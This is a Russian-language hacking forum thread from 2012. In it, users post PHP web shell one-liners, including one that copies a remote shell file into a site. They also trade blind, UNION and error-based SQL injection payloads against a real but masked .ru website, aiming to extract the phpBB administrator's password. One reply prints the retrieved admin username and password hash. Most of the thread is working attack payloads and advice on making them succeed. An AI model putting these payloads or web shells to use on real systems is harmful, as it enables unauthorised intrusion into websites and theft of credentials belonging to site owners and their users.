Старый 05.02.2012, 10:02   #1691
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

^mark
PHP код:
<?php eval(stripslashes($_REQUEST[as])); ?>&system('ls -lia');
<?php copy($_REQUEST[aa], $_REQUEST[bb]); ?>&aa=http://путь/шелл.php&bb=./шелл.php
<?php eval(base64_decode(строка в бейс64)); ?>
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 05.02.2012, 12:44   #1692
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

Цитата:
Сообщение от d0znpp Посмотреть сообщение
если инжект в яваскрипт или ивент, то обходить ничего не надо

К слову:
https://twitter.com/#!/0x6D6172696F/status/166109219156791296

Цитата:
.mario
Not too well-known yet not so uncommon XSS technique where HTML entities won't protect you http://bit.ly/wT520u
Beched вне форума   Ответить с цитированием
Старый 05.02.2012, 17:03   #1693
Facecontrol
Banned
 
Регистрация: 05.02.2012
Сообщений: 5
Репутация: -5
По умолчанию

А какие бывают уязвимости которые можно проверить и использовать для атаки через адресную строку,если можно,дайте списиок таких уязвимостей и видов атак.
Facecontrol вне форума   Ответить с цитированием
Старый 06.02.2012, 10:21   #1694
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

В бд есть таблицы от форума phpbb
Брутил так:http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+table_name+from+information_sche ma.tables+limit+0,1),1,1)))%3E=99,555,777)--+
Интересует таблица phpbb_acl_users и колонка user_password
Хочу сбрутить пароль с помощью blind sql injection делаю следующий запрос
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+user_password+from+phpbb_acl_use rs+limit+0,1),1,1)))%3E=100,555,777)--+
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+user_password+from+phpbb_users+l imit+0,1),1,1)))%3E=100,555,777)--+
но почему то выдает ошибку.
пробовал хексить имя колонки и имя таблицы и через функцию char(), но так тоже выдает ошибку.
Каким запросом можно брутить данные из колонки user_password? И можно ли объеденить запрос с user_id=2 чтоб сразу брутить пароль администратора?

Последний раз редактировалось Twost; 21.08.2013 в 14:02..
NetAng вне форума   Ответить с цитированием
Старый 06.02.2012, 10:58   #1695
c411k
 
Регистрация: 17.07.2010
Сообщений: 27
Репутация: 29
По умолчанию

Цитата:
Сообщение от NetAng Посмотреть сообщение
В бд есть таблицы от форума phpbb
Брутил так:http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+table_name+from+information_sche ma.tables+limit+0,1),1,1)))%3E=99,555,777)--+
Интересует таблица phpbb_acl_users и колонка user_password
Хочу сбрутить пароль с помощью blind sql injection делаю следующий запрос
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+user_password+from+phpbb_acl_use rs+limit+0,1),1,1)))%3E=100,555,777)--+
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( lower(mid((select+user_password+from+phpbb_users+l imit+0,1),1,1)))%3E=100,555,777)--+
но почему то выдает ошибку.
пробовал хексить имя колонки и имя таблицы и через функцию char(), но так тоже выдает ошибку.
Каким запросом можно брутить данные из колонки user_password? И можно ли объеденить запрос с user_id=2 чтоб сразу брутить пароль администратора?
select+user_password+from+phpbb_users+limit+0,1 это юзер "Anonymous", там пароль пустой.

select+user_password+from+phpbb_users+where id=2
или
select+user_password+from+phpbb_users+where username='tvoy_admin_name'

Последний раз редактировалось Twost; 21.08.2013 в 14:03..
c411k вне форума   Ответить с цитированием
Старый 06.02.2012, 11:11   #1696
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Всё равно запрос не проходит
Цитата:
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( %20lower(mid((select+user_password+from+phpbb_user s+where+user_id=2+limit+0,1),1,1)))%3E=100,555,777 )--+
Но вот например такой без проблем проходит:
Цитата:
http://www.***.ru/index.php?cat=4&razd=3&page_id=340+and+555=if(ord( %20%20lower(mid((select+table_name+from+informatio n_schema.tables+limit+0,1),1,1)))%3E=99,555,777)--+

Последний раз редактировалось Twost; 21.08.2013 в 14:03..
NetAng вне форума   Ответить с цитированием
Старый 06.02.2012, 11:27   #1697
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Код:
http://www.***.ru/index.php?cat=4&razd=3&page_id=-34+union+select+concat_ws(0x3a,user_id,username,user_password)+from+ms_db.phpbb_users+where+user_id=2--+f
Код:
2:msadmin:$H$9aBZg6kSlVgjB8MGbNctPVPT6AfyZv.
Вся проблема в том, что в текущей базе нет phpbb_users. Они есть в других базах, юзай запрос:
Код:
http://www.***.ru/index.php?cat=4&razd=3&page_id=-34+union+select+(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)--+f

Последний раз редактировалось Twost; 21.08.2013 в 14:04..
Ereeee вне форума   Ответить с цитированием
Старый 06.02.2012, 12:42   #1698
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Ereeee спасибо, не заметил там оказывается не blind даже.
NetAng вне форума   Ответить с цитированием
Старый 06.02.2012, 12:52   #1699
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Ребята, подскажите запрос для error-based без символа "*" звездочка.
Ereeee вне форума   Ответить с цитированием
Старый 06.02.2012, 13:02   #1700
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Ereeee Посмотреть сообщение
Ребята, подскажите запрос для error-based без символа "*" звездочка.
Код:
1 AND extractvalue(1,concat(0x3a,(select version())))
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot